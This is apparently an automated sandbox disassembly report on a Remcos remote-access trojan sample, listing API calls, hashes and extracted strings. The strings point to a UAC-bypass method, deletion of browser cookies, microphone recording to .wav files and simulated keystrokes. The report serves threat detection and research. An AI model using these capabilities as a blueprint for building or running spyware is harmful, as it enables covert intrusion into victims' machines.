                                                                                          • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                                                                          • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                            • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                                            • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                          • String ID: .part
                                                                                          • API String ID: 1303771098-3499674018
                                                                                          • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                          • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                                          • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                          • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                                          APIs
                                                                                          • AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                                                          • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                          • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$Window$AllocOutputShow
                                                                                          • String ID: Remcos v$5.1.3 Pro$CONOUT$
                                                                                          • API String ID: 4067487056-2212855755
                                                                                          • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                          • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                                                          • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                          • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                                          • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                                          • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                                          • __freea.LIBCMT ref: 0044AEB0
                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                          • __freea.LIBCMT ref: 0044AEB9
                                                                                          • __freea.LIBCMT ref: 0044AEDE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3864826663-0
                                                                                          • Opcode ID: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                                          • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                                          • Opcode Fuzzy Hash: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                                          • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                                          APIs
                                                                                          • SendInput.USER32 ref: 00419A25
                                                                                          • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                          • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                            • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: InputSend$Virtual
                                                                                          • String ID:
                                                                                          • API String ID: 1167301434-0
                                                                                          • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                          • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                                          • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                          • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16_free
                                                                                          • String ID: a/p$am/pm$h{D
                                                                                          • API String ID: 2936374016-2303565833
                                                                                          • Opcode ID: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                                          • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                          • Opcode Fuzzy Hash: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                                          • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                                          APIs
                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                          • _free.LIBCMT ref: 00444E87
                                                                                          • _free.LIBCMT ref: 00444E9E
                                                                                          • _free.LIBCMT ref: 00444EBD
                                                                                          • _free.LIBCMT ref: 00444ED8
                                                                                          • _free.LIBCMT ref: 00444EEF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$AllocateHeap
                                                                                          • String ID: KED
                                                                                          • API String ID: 3033488037-2133951994
                                                                                          • Opcode ID: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                                          • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                                          • Opcode Fuzzy Hash: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                                          • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                                          APIs
                                                                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                                                                          • __fassign.LIBCMT ref: 0044B4F9
                                                                                          • __fassign.LIBCMT ref: 0044B514
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B559
                                                                                          • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B592
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 1324828854-0
                                                                                          • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                          • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                                          • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                          • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                                          APIs
                                                                                            • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                                                                            • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                            • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                          • _wcslen.LIBCMT ref: 0041B7F4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                          • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                                          • API String ID: 3286818993-122982132
                                                                                          • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                          • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                          • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                          • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                                          APIs
                                                                                          • _strftime.LIBCMT ref: 00401D50
                                                                                            • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                          • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                          • String ID: %Y-%m-%d %H.%M$.wav
                                                                                          • API String ID: 3809562944-3597965672
                                                                                          • Opcode ID: 631b70e71605f283cfdfcec03d03cf742693868e286b15c17712ccdca5938df0
                                                                                          • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                                                          • Opcode Fuzzy Hash: 631b70e71605f283cfdfcec03d03cf742693868e286b15c17712ccdca5938df0
                                                                                          • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                                                          APIs
                                                                                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                          • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                          • API String ID: 1133728706-4073444585
                                                                                          • Opcode ID: de9f701630c3dbd9a8930b65653e0c0cdde26806c4295527bb8ee77c550589ac
                                                                                          • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                                                          • Opcode Fuzzy Hash: de9f701630c3dbd9a8930b65653e0c0cdde26806c4295527bb8ee77c550589ac
                                                                                          • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                                          • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                          • Opcode Fuzzy Hash: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                                          • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CloseHandle$CreatePointerWrite
                                                                                          • String ID: xpF
                                                                                          • API String ID: 1852769593-354647465
                                                                                          • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                          • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                                          • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                          • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                                          APIs
                                                                                            • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                          • _free.LIBCMT ref: 00450FC8
                                                                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                          • _free.LIBCMT ref: 00450FD3
                                                                                          • _free.LIBCMT ref: 00450FDE
                                                                                          • _free.LIBCMT ref: 00451032
                                                                                          • _free.LIBCMT ref: 0045103D
                                                                                          • _free.LIBCMT ref: 00451048
                                                                                          • _free.LIBCMT ref: 00451053
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                          • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                                          • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                          • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                          APIs
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                          • int.LIBCPMT ref: 004111BE
                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                          • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                          • String ID: (mG
                                                                                          • API String ID: 2536120697-4059303827
                                                                                          • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                          • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                                                          • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                          • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                          • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                          • String ID:
                                                                                          • API String ID: 3852720340-0
                                                                                          • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                          • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                                          • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                          • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                                          APIs
                                                                                          • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe), ref: 0040760B
                                                                                            • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                            • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                          • CoUninitialize.OLE32 ref: 00407664
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeObjectUninitialize_wcslen
                                                                                          • String ID: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                          • API String ID: 3851391207-1649178345
                                                                                          • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                          • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                                          • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                          • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                                          APIs
                                                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                          • GetLastError.KERNEL32 ref: 0040BB22
                                                                                          Strings
                                                                                          • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                          • UserProfile, xrefs: 0040BAE8
                                                                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                          • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteErrorFileLast
                                                                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                          • API String ID: 2018770650-304995407
                                                                                          • Opcode ID: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                                                          • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                                          • Opcode Fuzzy Hash: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                                                          • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                                          APIs
                                                                                          • __allrem.LIBCMT ref: 0043ACE9
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                                          • __allrem.LIBCMT ref: 0043AD1C
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                                          • __allrem.LIBCMT ref: 0043AD51
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                          • String ID:
                                                                                          • API String ID: 1992179935-0
                                                                                          • Opcode ID: 52068ab3a7cfe922dfe01ed446ba536eb0656cd97dd847f62b494b0202e28e08
                                                                                          • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                                          • Opcode Fuzzy Hash: 52068ab3a7cfe922dfe01ed446ba536eb0656cd97dd847f62b494b0202e28e08
                                                                                          • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
